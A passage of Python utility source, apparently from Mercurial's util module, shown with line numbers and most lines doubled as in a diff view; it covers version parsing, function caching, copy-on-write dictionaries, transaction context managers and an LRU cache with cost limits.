1149 returned values:
1149 returned values:
1150
1150
1151 >>> v = b'3.6.1+190-df9b73d2d444'
1151 >>> v = b'3.6.1+190-df9b73d2d444'
1152 >>> versiontuple(v, 2)
1152 >>> versiontuple(v, 2)
1153 (3, 6)
1153 (3, 6)
1154 >>> versiontuple(v, 3)
1154 >>> versiontuple(v, 3)
1155 (3, 6, 1)
1155 (3, 6, 1)
1156 >>> versiontuple(v, 4)
1156 >>> versiontuple(v, 4)
1157 (3, 6, 1, '190-df9b73d2d444')
1157 (3, 6, 1, '190-df9b73d2d444')
1158
1158
1159 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1159 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1160 (3, 6, 1, '190-df9b73d2d444+20151118')
1160 (3, 6, 1, '190-df9b73d2d444+20151118')
1161
1161
1162 >>> v = b'3.6'
1162 >>> v = b'3.6'
1163 >>> versiontuple(v, 2)
1163 >>> versiontuple(v, 2)
1164 (3, 6)
1164 (3, 6)
1165 >>> versiontuple(v, 3)
1165 >>> versiontuple(v, 3)
1166 (3, 6, None)
1166 (3, 6, None)
1167 >>> versiontuple(v, 4)
1167 >>> versiontuple(v, 4)
1168 (3, 6, None, None)
1168 (3, 6, None, None)
1169
1169
1170 >>> v = b'3.9-rc'
1170 >>> v = b'3.9-rc'
1171 >>> versiontuple(v, 2)
1171 >>> versiontuple(v, 2)
1172 (3, 9)
1172 (3, 9)
1173 >>> versiontuple(v, 3)
1173 >>> versiontuple(v, 3)
1174 (3, 9, None)
1174 (3, 9, None)
1175 >>> versiontuple(v, 4)
1175 >>> versiontuple(v, 4)
1176 (3, 9, None, 'rc')
1176 (3, 9, None, 'rc')
1177
1177
1178 >>> v = b'3.9-rc+2-02a8fea4289b'
1178 >>> v = b'3.9-rc+2-02a8fea4289b'
1179 >>> versiontuple(v, 2)
1179 >>> versiontuple(v, 2)
1180 (3, 9)
1180 (3, 9)
1181 >>> versiontuple(v, 3)
1181 >>> versiontuple(v, 3)
1182 (3, 9, None)
1182 (3, 9, None)
1183 >>> versiontuple(v, 4)
1183 >>> versiontuple(v, 4)
1184 (3, 9, None, 'rc+2-02a8fea4289b')
1184 (3, 9, None, 'rc+2-02a8fea4289b')
1185
1185
1186 >>> versiontuple(b'4.6rc0')
1186 >>> versiontuple(b'4.6rc0')
1187 (4, 6, None, 'rc0')
1187 (4, 6, None, 'rc0')
1188 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1188 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1189 (4, 6, None, 'rc0+12-425d55e54f98')
1189 (4, 6, None, 'rc0+12-425d55e54f98')
1190 >>> versiontuple(b'.1.2.3')
1190 >>> versiontuple(b'.1.2.3')
1191 (None, None, None, '.1.2.3')
1191 (None, None, None, '.1.2.3')
1192 >>> versiontuple(b'12.34..5')
1192 >>> versiontuple(b'12.34..5')
1193 (12, 34, None, '..5')
1193 (12, 34, None, '..5')
1194 >>> versiontuple(b'1.2.3.4.5.6')
1194 >>> versiontuple(b'1.2.3.4.5.6')
1195 (1, 2, 3, '.4.5.6')
1195 (1, 2, 3, '.4.5.6')
1196 """
1196 """
1197 if not v:
1197 if not v:
1198 v = version()
1198 v = version()
1199 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1199 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1200 if not m:
1200 if not m:
1201 vparts, extra = b'', v
1201 vparts, extra = b'', v
1202 elif m.group(2):
1202 elif m.group(2):
1203 vparts, extra = m.groups()
1203 vparts, extra = m.groups()
1204 else:
1204 else:
1205 vparts, extra = m.group(1), None
1205 vparts, extra = m.group(1), None
1206
1206
1207 assert vparts is not None # help pytype
1207 assert vparts is not None # help pytype
1208
1208
1209 vints = []
1209 vints = []
1210 for i in vparts.split(b'.'):
1210 for i in vparts.split(b'.'):
1211 try:
1211 try:
1212 vints.append(int(i))
1212 vints.append(int(i))
1213 except ValueError:
1213 except ValueError:
1214 break
1214 break
1215 # (3, 6) -> (3, 6, None)
1215 # (3, 6) -> (3, 6, None)
1216 while len(vints) < 3:
1216 while len(vints) < 3:
1217 vints.append(None)
1217 vints.append(None)
1218
1218
1219 if n == 2:
1219 if n == 2:
1220 return (vints[0], vints[1])
1220 return (vints[0], vints[1])
1221 if n == 3:
1221 if n == 3:
1222 return (vints[0], vints[1], vints[2])
1222 return (vints[0], vints[1], vints[2])
1223 if n == 4:
1223 if n == 4:
1224 return (vints[0], vints[1], vints[2], extra)
1224 return (vints[0], vints[1], vints[2], extra)
1225
1225
1226
1226
1227 def cachefunc(func):
1227 def cachefunc(func):
1228 '''cache the result of function calls'''
1228 '''cache the result of function calls'''
1229 # XXX doesn't handle keyword args
1229 # XXX doesn't handle keyword args
1230 if func.__code__.co_argcount == 0:
1230 if func.__code__.co_argcount == 0:
1231 listcache = []
1231 listcache = []
1232
1232
1233 def f():
1233 def f():
1234 if len(listcache) == 0:
1234 if len(listcache) == 0:
1235 listcache.append(func())
1235 listcache.append(func())
1236 return listcache[0]
1236 return listcache[0]
1237
1237
1238 return f
1238 return f
1239 cache = {}
1239 cache = {}
1240 if func.__code__.co_argcount == 1:
1240 if func.__code__.co_argcount == 1:
1241 # we gain a small amount of time because
1241 # we gain a small amount of time because
1242 # we don't need to pack/unpack the list
1242 # we don't need to pack/unpack the list
1243 def f(arg):
1243 def f(arg):
1244 if arg not in cache:
1244 if arg not in cache:
1245 cache[arg] = func(arg)
1245 cache[arg] = func(arg)
1246 return cache[arg]
1246 return cache[arg]
1247
1247
1248 else:
1248 else:
1249
1249
1250 def f(*args):
1250 def f(*args):
1251 if args not in cache:
1251 if args not in cache:
1252 cache[args] = func(*args)
1252 cache[args] = func(*args)
1253 return cache[args]
1253 return cache[args]
1254
1254
1255 return f
1255 return f
1256
1256
1257
1257
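# Illustrative sketch (not part of the original module): cachefunc() memoizes
# on positional arguments only, so the wrapped function runs once per distinct
# argument tuple. The names below are invented for the example.
def _cachefunc_example():
    calls = []

    def square(x):
        calls.append(x)
        return x * x

    cached = cachefunc(square)
    results = (cached(3), cached(3), cached(4))
    return results, calls  # ((9, 9, 16), [3, 4])
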
1258 class cow(object):
1258 class cow(object):
1259 """helper class to make copy-on-write easier
1259 """helper class to make copy-on-write easier
1260
1260
1261 Call preparewrite before doing any writes.
1261 Call preparewrite before doing any writes.
1262 """
1262 """
1263
1263
1264 def preparewrite(self):
1264 def preparewrite(self):
1265 """call this before writes, return self or a copied new object"""
1265 """call this before writes, return self or a copied new object"""
1266 if getattr(self, '_copied', 0):
1266 if getattr(self, '_copied', 0):
1267 self._copied -= 1
1267 self._copied -= 1
1268 return self.__class__(self)
1268 return self.__class__(self)
1269 return self
1269 return self
1270
1270
1271 def copy(self):
1271 def copy(self):
1272 """always do a cheap copy"""
1272 """always do a cheap copy"""
1273 self._copied = getattr(self, '_copied', 0) + 1
1273 self._copied = getattr(self, '_copied', 0) + 1
1274 return self
1274 return self
1275
1275
1276
1276
1277 class sortdict(collections.OrderedDict):
1277 class sortdict(collections.OrderedDict):
1278 """a simple sorted dictionary
1278 """a simple sorted dictionary
1279
1279
1280 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1280 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1281 >>> d2 = d1.copy()
1281 >>> d2 = d1.copy()
1282 >>> d2
1282 >>> d2
1283 sortdict([('a', 0), ('b', 1)])
1283 sortdict([('a', 0), ('b', 1)])
1284 >>> d2.update([(b'a', 2)])
1284 >>> d2.update([(b'a', 2)])
1285 >>> list(d2.keys()) # should still be in last-set order
1285 >>> list(d2.keys()) # should still be in last-set order
1286 ['b', 'a']
1286 ['b', 'a']
1287 >>> d1.insert(1, b'a.5', 0.5)
1287 >>> d1.insert(1, b'a.5', 0.5)
1288 >>> d1
1288 >>> d1
1289 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1289 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1290 """
1290 """
1291
1291
1292 def __setitem__(self, key, value):
1292 def __setitem__(self, key, value):
1293 if key in self:
1293 if key in self:
1294 del self[key]
1294 del self[key]
1295 super(sortdict, self).__setitem__(key, value)
1295 super(sortdict, self).__setitem__(key, value)
1296
1296
1297 if pycompat.ispypy:
1297 if pycompat.ispypy:
1298 # __setitem__() isn't called as of PyPy 5.8.0
1298 # __setitem__() isn't called as of PyPy 5.8.0
1299 def update(self, src):
1299 def update(self, src):
1300 if isinstance(src, dict):
1300 if isinstance(src, dict):
1301 src = pycompat.iteritems(src)
1301 src = pycompat.iteritems(src)
1302 for k, v in src:
1302 for k, v in src:
1303 self[k] = v
1303 self[k] = v
1304
1304
1305 def insert(self, position, key, value):
1305 def insert(self, position, key, value):
1306 for (i, (k, v)) in enumerate(list(self.items())):
1306 for (i, (k, v)) in enumerate(list(self.items())):
1307 if i == position:
1307 if i == position:
1308 self[key] = value
1308 self[key] = value
1309 if i >= position:
1309 if i >= position:
1310 del self[k]
1310 del self[k]
1311 self[k] = v
1311 self[k] = v
1312
1312
1313
1313
1314 class cowdict(cow, dict):
1314 class cowdict(cow, dict):
1315 """copy-on-write dict
1315 """copy-on-write dict
1316
1316
1317 Be sure to call d = d.preparewrite() before writing to d.
1317 Be sure to call d = d.preparewrite() before writing to d.
1318
1318
1319 >>> a = cowdict()
1319 >>> a = cowdict()
1320 >>> a is a.preparewrite()
1320 >>> a is a.preparewrite()
1321 True
1321 True
1322 >>> b = a.copy()
1322 >>> b = a.copy()
1323 >>> b is a
1323 >>> b is a
1324 True
1324 True
1325 >>> c = b.copy()
1325 >>> c = b.copy()
1326 >>> c is a
1326 >>> c is a
1327 True
1327 True
1328 >>> a = a.preparewrite()
1328 >>> a = a.preparewrite()
1329 >>> b is a
1329 >>> b is a
1330 False
1330 False
1331 >>> a is a.preparewrite()
1331 >>> a is a.preparewrite()
1332 True
1332 True
1333 >>> c = c.preparewrite()
1333 >>> c = c.preparewrite()
1334 >>> b is c
1334 >>> b is c
1335 False
1335 False
1336 >>> b is b.preparewrite()
1336 >>> b is b.preparewrite()
1337 True
1337 True
1338 """
1338 """
1339
1339
1340
1340
1341 class cowsortdict(cow, sortdict):
1341 class cowsortdict(cow, sortdict):
1342 """copy-on-write sortdict
1342 """copy-on-write sortdict
1343
1343
1344 Be sure to call d = d.preparewrite() before writing to d.
1344 Be sure to call d = d.preparewrite() before writing to d.
1345 """
1345 """
1346
1346
1347
1347
1348 class transactional(object): # pytype: disable=ignored-metaclass
1348 class transactional(object): # pytype: disable=ignored-metaclass
1349 """Base class for making a transactional type into a context manager."""
1349 """Base class for making a transactional type into a context manager."""
1350
1350
1351 __metaclass__ = abc.ABCMeta
1351 __metaclass__ = abc.ABCMeta
1352
1352
1353 @abc.abstractmethod
1353 @abc.abstractmethod
1354 def close(self):
1354 def close(self):
1355 """Successfully closes the transaction."""
1355 """Successfully closes the transaction."""
1356
1356
1357 @abc.abstractmethod
1357 @abc.abstractmethod
1358 def release(self):
1358 def release(self):
1359 """Marks the end of the transaction.
1359 """Marks the end of the transaction.
1360
1360
1361 If the transaction has not been closed, it will be aborted.
1361 If the transaction has not been closed, it will be aborted.
1362 """
1362 """
1363
1363
1364 def __enter__(self):
1364 def __enter__(self):
1365 return self
1365 return self
1366
1366
1367 def __exit__(self, exc_type, exc_val, exc_tb):
1367 def __exit__(self, exc_type, exc_val, exc_tb):
1368 try:
1368 try:
1369 if exc_type is None:
1369 if exc_type is None:
1370 self.close()
1370 self.close()
1371 finally:
1371 finally:
1372 self.release()
1372 self.release()
1373
1373
1374
1374
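# Hedged sketch (not part of the original module): a minimal transactional
# subclass showing the context-manager contract enforced by __exit__():
# close() runs only on success, release() always runs afterwards. The class
# and its attribute names are invented for illustration.
class _demotransaction(transactional):
    def __init__(self):
        self.events = []

    def close(self):
        self.events.append(b'close')

    def release(self):
        self.events.append(b'release')


def _transactional_example():
    tr = _demotransaction()
    with tr:
        pass
    return tr.events  # [b'close', b'release']
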
1375 @contextlib.contextmanager
1375 @contextlib.contextmanager
1376 def acceptintervention(tr=None):
1376 def acceptintervention(tr=None):
1377 """A context manager that closes the transaction on InterventionRequired
1377 """A context manager that closes the transaction on InterventionRequired
1378
1378
1379 If no transaction was provided, this simply runs the body and returns
1379 If no transaction was provided, this simply runs the body and returns
1380 """
1380 """
1381 if not tr:
1381 if not tr:
1382 yield
1382 yield
1383 return
1383 return
1384 try:
1384 try:
1385 yield
1385 yield
1386 tr.close()
1386 tr.close()
1387 except error.InterventionRequired:
1387 except error.InterventionRequired:
1388 tr.close()
1388 tr.close()
1389 raise
1389 raise
1390 finally:
1390 finally:
1391 tr.release()
1391 tr.release()
1392
1392
1393
1393
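# Illustrative sketch (not part of the original source): acceptintervention()
# commits the transaction even when InterventionRequired escapes the body,
# so the operation can be resumed later; any other exception only triggers
# tr.release(). `tr` is assumed to be any object with close()/release().
def _acceptintervention_example(tr):
    with acceptintervention(tr):
        pass  # work that may raise error.InterventionRequired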
1394 @contextlib.contextmanager
1394 @contextlib.contextmanager
1395 def nullcontextmanager(enter_result=None):
1395 def nullcontextmanager(enter_result=None):
1396 yield enter_result
1396 yield enter_result
1397
1397
1398
1398
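# Illustrative sketch (not part of the original source): nullcontextmanager()
# stands in for a real context manager on code paths that may not need one.
# `lock`, if supplied, is assumed to be a context manager itself.
def _nullcontextmanager_example(lock=None):
    ctx = lock if lock is not None else nullcontextmanager()
    with ctx:
        pass  # the body runs identically whether or not a lock was supplied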
1399 class _lrucachenode(object):
1399 class _lrucachenode(object):
1400 """A node in a doubly linked list.
1400 """A node in a doubly linked list.
1401
1401
1402 Holds a reference to nodes on either side as well as a key-value
1402 Holds a reference to nodes on either side as well as a key-value
1403 pair for the dictionary entry.
1403 pair for the dictionary entry.
1404 """
1404 """
1405
1405
1406 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1406 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1407
1407
1408 def __init__(self):
1408 def __init__(self):
1409 self.next = None
1409 self.next = None
1410 self.prev = None
1410 self.prev = None
1411
1411
1412 self.key = _notset
1412 self.key = _notset
1413 self.value = None
1413 self.value = None
1414 self.cost = 0
1414 self.cost = 0
1415
1415
1416 def markempty(self):
1416 def markempty(self):
1417 """Mark the node as emptied."""
1417 """Mark the node as emptied."""
1418 self.key = _notset
1418 self.key = _notset
1419 self.value = None
1419 self.value = None
1420 self.cost = 0
1420 self.cost = 0
1421
1421
1422
1422
1423 class lrucachedict(object):
1423 class lrucachedict(object):
1424 """Dict that caches most recent accesses and sets.
1424 """Dict that caches most recent accesses and sets.
1425
1425
1426 The dict consists of an actual backing dict - indexed by original
1426 The dict consists of an actual backing dict - indexed by original
1427 key - and a doubly linked circular list defining the order of entries in
1427 key - and a doubly linked circular list defining the order of entries in
1428 the cache.
1428 the cache.
1429
1429
1430 The head node is the newest entry in the cache. If the cache is full,
1430 The head node is the newest entry in the cache. If the cache is full,
1431 we recycle head.prev and make it the new head. Cache accesses result in
1431 we recycle head.prev and make it the new head. Cache accesses result in
1432 the node being moved to before the existing head and being marked as the
1432 the node being moved to before the existing head and being marked as the
1433 new head node.
1433 new head node.
1434
1434
1435 Items in the cache can be inserted with an optional "cost" value. This is
1435 Items in the cache can be inserted with an optional "cost" value. This is
1436 simply an integer that is specified by the caller. The cache can be queried
1436 simply an integer that is specified by the caller. The cache can be queried
1437 for the total cost of all items presently in the cache.
1437 for the total cost of all items presently in the cache.
1438
1438
1439 The cache can also define a maximum cost. If a cache insertion would
1439 The cache can also define a maximum cost. If a cache insertion would
1440 cause the total cost of the cache to go beyond the maximum cost limit,
1440 cause the total cost of the cache to go beyond the maximum cost limit,
1441 nodes will be evicted to make room for the new node. This can be used
1441 nodes will be evicted to make room for the new node. This can be used
1442 to e.g. set a max memory limit and associate an estimated bytes size
1442 to e.g. set a max memory limit and associate an estimated bytes size
1443 cost to each item in the cache. By default, no maximum cost is enforced.
1443 cost to each item in the cache. By default, no maximum cost is enforced.
1444 """
1444 """
1445
1445
1446 def __init__(self, max, maxcost=0):
1446 def __init__(self, max, maxcost=0):
1447 self._cache = {}
1447 self._cache = {}
1448
1448
1449 self._head = head = _lrucachenode()
1449 self._head = head = _lrucachenode()
1450 head.prev = head
1450 head.prev = head
1451 head.next = head
1451 head.next = head
1452 self._size = 1
1452 self._size = 1
1453 self.capacity = max
1453 self.capacity = max
1454 self.totalcost = 0
1454 self.totalcost = 0
1455 self.maxcost = maxcost
1455 self.maxcost = maxcost
1456
1456
1457 def __len__(self):
1457 def __len__(self):
1458 return len(self._cache)
1458 return len(self._cache)
1459
1459
1460 def __contains__(self, k):
1460 def __contains__(self, k):
1461 return k in self._cache
1461 return k in self._cache
1462
1462
1463 def __iter__(self):
1463 def __iter__(self):
1464 # We don't have to iterate in cache order, but why not.
1464 # We don't have to iterate in cache order, but why not.
1465 n = self._head
1465 n = self._head
1466 for i in range(len(self._cache)):
1466 for i in range(len(self._cache)):
1467 yield n.key
1467 yield n.key
1468 n = n.next
1468 n = n.next
1469
1469
1470 def __getitem__(self, k):
1470 def __getitem__(self, k):
1471 node = self._cache[k]
1471 node = self._cache[k]
1472 self._movetohead(node)
1472 self._movetohead(node)
1473 return node.value
1473 return node.value
1474
1474
1475 def insert(self, k, v, cost=0):
1475 def insert(self, k, v, cost=0):
1476 """Insert a new item in the cache with optional cost value."""
1476 """Insert a new item in the cache with optional cost value."""
1477 node = self._cache.get(k)
1477 node = self._cache.get(k)
1478 # Replace existing value and mark as newest.
1478 # Replace existing value and mark as newest.
1479 if node is not None:
1479 if node is not None:
1480 self.totalcost -= node.cost
1480 self.totalcost -= node.cost
1481 node.value = v
1481 node.value = v
1482 node.cost = cost
1482 node.cost = cost
1483 self.totalcost += cost
1483 self.totalcost += cost
1484 self._movetohead(node)
1484 self._movetohead(node)
1485
1485
1486 if self.maxcost:
1486 if self.maxcost:
1487 self._enforcecostlimit()
1487 self._enforcecostlimit()
1488
1488
1489 return
1489 return
1490
1490
1491 if self._size < self.capacity:
1491 if self._size < self.capacity:
1492 node = self._addcapacity()
1492 node = self._addcapacity()
1493 else:
1493 else:
1494 # Grab the last/oldest item.
1494 # Grab the last/oldest item.
1495 node = self._head.prev
1495 node = self._head.prev
1496
1496
1497 # At capacity. Kill the old entry.
1497 # At capacity. Kill the old entry.
1498 if node.key is not _notset:
1498 if node.key is not _notset:
1499 self.totalcost -= node.cost
1499 self.totalcost -= node.cost
1500 del self._cache[node.key]
1500 del self._cache[node.key]
1501
1501
1502 node.key = k
1502 node.key = k
1503 node.value = v
1503 node.value = v
1504 node.cost = cost
1504 node.cost = cost
1505 self.totalcost += cost
1505 self.totalcost += cost
1506 self._cache[k] = node
1506 self._cache[k] = node
1507 # And mark it as newest entry. No need to adjust order since it
1507 # And mark it as newest entry. No need to adjust order since it
1508 # is already self._head.prev.
1508 # is already self._head.prev.
1509 self._head = node
1509 self._head = node
1510
1510
1511 if self.maxcost:
1511 if self.maxcost:
1512 self._enforcecostlimit()
1512 self._enforcecostlimit()
1513
1513
1514 def __setitem__(self, k, v):
1514 def __setitem__(self, k, v):
1515 self.insert(k, v)
1515 self.insert(k, v)
1516
1516
1517 def __delitem__(self, k):
1517 def __delitem__(self, k):
1518 self.pop(k)
1518 self.pop(k)
1519
1519
1520 def pop(self, k, default=_notset):
1520 def pop(self, k, default=_notset):
1521 try:
1521 try:
1522 node = self._cache.pop(k)
1522 node = self._cache.pop(k)
1523 except KeyError:
1523 except KeyError:
1524 if default is _notset:
1524 if default is _notset:
1525 raise
1525 raise
1526 return default
1526 return default
1527
1527
1528 assert node is not None # help pytype
1528 assert node is not None # help pytype
1529 value = node.value
1529 value = node.value
1530 self.totalcost -= node.cost
1530 self.totalcost -= node.cost
1531 node.markempty()
1531 node.markempty()
1532
1532
1533 # Temporarily mark as newest item before re-adjusting head to make
1533 # Temporarily mark as newest item before re-adjusting head to make
1534 # this node the oldest item.
1534 # this node the oldest item.
1535 self._movetohead(node)
1535 self._movetohead(node)
1536 self._head = node.next
1536 self._head = node.next
1537
1537
1538 return value
1538 return value
1539
1539
1540 # Additional dict methods.
1540 # Additional dict methods.
1541
1541
1542 def get(self, k, default=None):
1542 def get(self, k, default=None):
1543 try:
1543 try:
1544 return self.__getitem__(k)
1544 return self.__getitem__(k)
1545 except KeyError:
1545 except KeyError:
1546 return default
1546 return default
1547
1547
1548 def peek(self, k, default=_notset):
1548 def peek(self, k, default=_notset):
1549 """Get the specified item without moving it to the head
1549 """Get the specified item without moving it to the head
1550
1550
1551 Unlike get(), this doesn't mutate the internal state. But be aware
1551 Unlike get(), this doesn't mutate the internal state. But be aware
1552 that this does not make peek() thread safe.
1552 that this does not make peek() thread safe.
1553 """
1553 """
1554 try:
1554 try:
1555 node = self._cache[k]
1555 node = self._cache[k]
1556 return node.value
1556 return node.value
1557 except KeyError:
1557 except KeyError:
1558 if default is _notset:
1558 if default is _notset:
1559 raise
1559 raise
1560 return default
1560 return default
1561
1561
1562 def clear(self):
1562 def clear(self):
1563 n = self._head
1563 n = self._head
1564 while n.key is not _notset:
1564 while n.key is not _notset:
1565 self.totalcost -= n.cost
1565 self.totalcost -= n.cost
1566 n.markempty()
1566 n.markempty()
1567 n = n.next
1567 n = n.next
1568
1568
1569 self._cache.clear()
1569 self._cache.clear()
1570
1570
1571 def copy(self, capacity=None, maxcost=0):
1571 def copy(self, capacity=None, maxcost=0):
1572 """Create a new cache as a copy of the current one.
1572 """Create a new cache as a copy of the current one.
1573
1573
1574 By default, the new cache has the same capacity as the existing one.
1574 By default, the new cache has the same capacity as the existing one.
1575 But, the cache capacity can be changed as part of performing the
1575 But, the cache capacity can be changed as part of performing the
1576 copy.
1576 copy.
1577
1577
1578 Items in the copy have an insertion/access order matching this
1578 Items in the copy have an insertion/access order matching this
1579 instance.
1579 instance.
1580 """
1580 """
1581
1581
1582 capacity = capacity or self.capacity
1582 capacity = capacity or self.capacity
1583 maxcost = maxcost or self.maxcost
1583 maxcost = maxcost or self.maxcost
1584 result = lrucachedict(capacity, maxcost=maxcost)
1584 result = lrucachedict(capacity, maxcost=maxcost)
1585
1585
1586 # We copy entries by iterating in oldest-to-newest order so the copy
1586 # We copy entries by iterating in oldest-to-newest order so the copy
1587 # has the correct ordering.
1587 # has the correct ordering.
1588
1588
1589 # Find the first non-empty entry.
1589 # Find the first non-empty entry.
1590 n = self._head.prev
1590 n = self._head.prev
1591 while n.key is _notset and n is not self._head:
1591 while n.key is _notset and n is not self._head:
1592 n = n.prev
1592 n = n.prev
1593
1593
1594 # We could potentially skip the first N items when decreasing capacity.
1594 # We could potentially skip the first N items when decreasing capacity.
1595 # But let's keep it simple unless it is a performance problem.
1595 # But let's keep it simple unless it is a performance problem.
1596 for i in range(len(self._cache)):
1596 for i in range(len(self._cache)):
1597 result.insert(n.key, n.value, cost=n.cost)
1597 result.insert(n.key, n.value, cost=n.cost)
1598 n = n.prev
1598 n = n.prev
1599
1599
1600 return result
1600 return result
1601
1601
1602 def popoldest(self):
1602 def popoldest(self):
1603 """Remove the oldest item from the cache.
1603 """Remove the oldest item from the cache.
1604
1604
1605 Returns the (key, value) describing the removed cache entry.
1605 Returns the (key, value) describing the removed cache entry.
1606 """
1606 """
1607 if not self._cache:
1607 if not self._cache:
1608 return
1608 return
1609
1609
1610 # Walk the linked list backwards starting at tail node until we hit
1610 # Walk the linked list backwards starting at tail node until we hit
1611 # a non-empty node.
1611 # a non-empty node.
1612 n = self._head.prev
1612 n = self._head.prev
1613 while n.key is _notset:
1613 while n.key is _notset:
1614 n = n.prev
1614 n = n.prev
1615
1615
1616 assert n is not None # help pytype
1616 assert n is not None # help pytype
1617
1617
1618 key, value = n.key, n.value
1618 key, value = n.key, n.value
1619
1619
1620 # And remove it from the cache and mark it as empty.
1620 # And remove it from the cache and mark it as empty.
1621 del self._cache[n.key]
1621 del self._cache[n.key]
1622 self.totalcost -= n.cost
1622 self.totalcost -= n.cost
1623 n.markempty()
1623 n.markempty()
1624
1624
1625 return key, value
1625 return key, value
1626
1626
1627 def _movetohead(self, node):
1627 def _movetohead(self, node):
1628 """Mark a node as the newest, making it the new head.
1628 """Mark a node as the newest, making it the new head.
1629
1629
1630 When a node is accessed, it becomes the freshest entry in the LRU
1630 When a node is accessed, it becomes the freshest entry in the LRU
1631 list, which is denoted by self._head.
1631 list, which is denoted by self._head.
1632
1632
1633 Visually, let's make ``N`` the new head node (* denotes head):
1633 Visually, let's make ``N`` the new head node (* denotes head):
1634
1634
1635 previous/oldest <-> head <-> next/next newest
1635 previous/oldest <-> head <-> next/next newest
1636
1636
1637 ----<->--- A* ---<->-----
1637 ----<->--- A* ---<->-----
1638 | |
1638 | |
1639 E <-> D <-> N <-> C <-> B
1639 E <-> D <-> N <-> C <-> B
1640
1640
1641 To:
1641 To:
1642
1642
1643 ----<->--- N* ---<->-----
1643 ----<->--- N* ---<->-----
1644 | |
1644 | |
1645 E <-> D <-> C <-> B <-> A
1645 E <-> D <-> C <-> B <-> A
1646
1646
1647 This requires the following moves:
1647 This requires the following moves:
1648
1648
1649 C.next = D (node.prev.next = node.next)
1649 C.next = D (node.prev.next = node.next)
1650 D.prev = C (node.next.prev = node.prev)
1650 D.prev = C (node.next.prev = node.prev)
1651 E.next = N (head.prev.next = node)
1651 E.next = N (head.prev.next = node)
1652 N.prev = E (node.prev = head.prev)
1652 N.prev = E (node.prev = head.prev)
1653 N.next = A (node.next = head)
1653 N.next = A (node.next = head)
1654 A.prev = N (head.prev = node)
1654 A.prev = N (head.prev = node)
1655 """
1655 """
1656 head = self._head
1656 head = self._head
1657 # C.next = D
1657 # C.next = D
1658 node.prev.next = node.next
1658 node.prev.next = node.next
1659 # D.prev = C
1659 # D.prev = C
1660 node.next.prev = node.prev
1660 node.next.prev = node.prev
1661 # N.prev = E
1661 # N.prev = E
1662 node.prev = head.prev
1662 node.prev = head.prev
1663 # N.next = A
1663 # N.next = A
1664 # It is tempting to do just "head" here, however if node is
1664 # It is tempting to do just "head" here, however if node is
1665 # adjacent to head, this will do bad things.
1665 # adjacent to head, this will do bad things.
1666 node.next = head.prev.next
1666 node.next = head.prev.next
1667 # E.next = N
1667 # E.next = N
1668 node.next.prev = node
1668 node.next.prev = node
1669 # A.prev = N
1669 # A.prev = N
1670 node.prev.next = node
1670 node.prev.next = node
1671
1671
1672 self._head = node
1672 self._head = node
1673
1673
1674 def _addcapacity(self):
1674 def _addcapacity(self):
1675 """Add a node to the circular linked list.
1675 """Add a node to the circular linked list.
1676
1676
1677 The new node is inserted before the head node.
1677 The new node is inserted before the head node.
1678 """
1678 """
1679 head = self._head
1679 head = self._head
1680 node = _lrucachenode()
1680 node = _lrucachenode()
1681 head.prev.next = node
1681 head.prev.next = node
1682 node.prev = head.prev
1682 node.prev = head.prev
1683 node.next = head
1683 node.next = head
1684 head.prev = node
1684 head.prev = node
1685 self._size += 1
1685 self._size += 1
1686 return node
1686 return node
1687
1687
1688 def _enforcecostlimit(self):
1688 def _enforcecostlimit(self):
1689 # This should run after an insertion. It should only be called if total
1689 # This should run after an insertion. It should only be called if total
1690 # cost limits are being enforced.
1690 # cost limits are being enforced.
1691 # The most recently inserted node is never evicted.
1691 # The most recently inserted node is never evicted.
1692 if len(self) <= 1 or self.totalcost <= self.maxcost:
1692 if len(self) <= 1 or self.totalcost <= self.maxcost:
1693 return
1693 return
1694
1694
1695 # This is logically equivalent to calling popoldest() until we
1695 # This is logically equivalent to calling popoldest() until we
1696 # free up enough cost. We don't do that since popoldest() needs
1696 # free up enough cost. We don't do that since popoldest() needs
1697 # to walk the linked list and doing this in a loop would be
1697 # to walk the linked list and doing this in a loop would be
1698 # quadratic. So we find the first non-empty node and then
1698 # quadratic. So we find the first non-empty node and then
1699 # walk nodes until we free up enough capacity.
1699 # walk nodes until we free up enough capacity.
1700 #
1700 #
1701 # If we only removed the minimum number of nodes to free enough
1701 # If we only removed the minimum number of nodes to free enough
1702 # cost at insert time, chances are high that the next insert would
1702 # cost at insert time, chances are high that the next insert would
1703 # also require pruning. This would effectively constitute quadratic
1703 # also require pruning. This would effectively constitute quadratic
1704 # behavior for insert-heavy workloads. To mitigate this, we set a
1704 # behavior for insert-heavy workloads. To mitigate this, we set a
1705 # target cost that is a percentage of the max cost. This will tend
1705 # target cost that is a percentage of the max cost. This will tend
1706 # to free more nodes when the high water mark is reached, which
1706 # to free more nodes when the high water mark is reached, which
1707 # lowers the chances of needing to prune on the subsequent insert.
1707 # lowers the chances of needing to prune on the subsequent insert.
1708 targetcost = int(self.maxcost * 0.75)
1708 targetcost = int(self.maxcost * 0.75)
1709
1709
1710 n = self._head.prev
1710 n = self._head.prev
1711 while n.key is _notset:
1711 while n.key is _notset:
1712 n = n.prev
1712 n = n.prev
1713
1713
1714 while len(self) > 1 and self.totalcost > targetcost:
1714 while len(self) > 1 and self.totalcost > targetcost:
1715 del self._cache[n.key]
1715 del self._cache[n.key]
1716 self.totalcost -= n.cost
1716 self.totalcost -= n.cost
1717 n.markempty()
1717 n.markempty()
1718 n = n.prev
1718 n = n.prev
1719
1719
1720
1720
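# Illustrative sketch (not part of the original source): cost-aware eviction
# in lrucachedict. The capacity, keys and costs below are arbitrary.
def _lrucachedict_example():
    d = lrucachedict(4, maxcost=10)
    d.insert(b'a', b'value-a', cost=6)
    d.insert(b'b', b'value-b', cost=6)
    # total cost (12) exceeded maxcost (10), so the oldest entry was
    # evicted; the most recently inserted node is never evicted.
    assert b'a' not in d
    assert b'b' in d
    assert d.totalcost == 6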
1721 def lrucachefunc(func):
1721 def lrucachefunc(func):
1722 '''cache most recent results of function calls'''
1722 '''cache most recent results of function calls'''
1723 cache = {}
1723 cache = {}
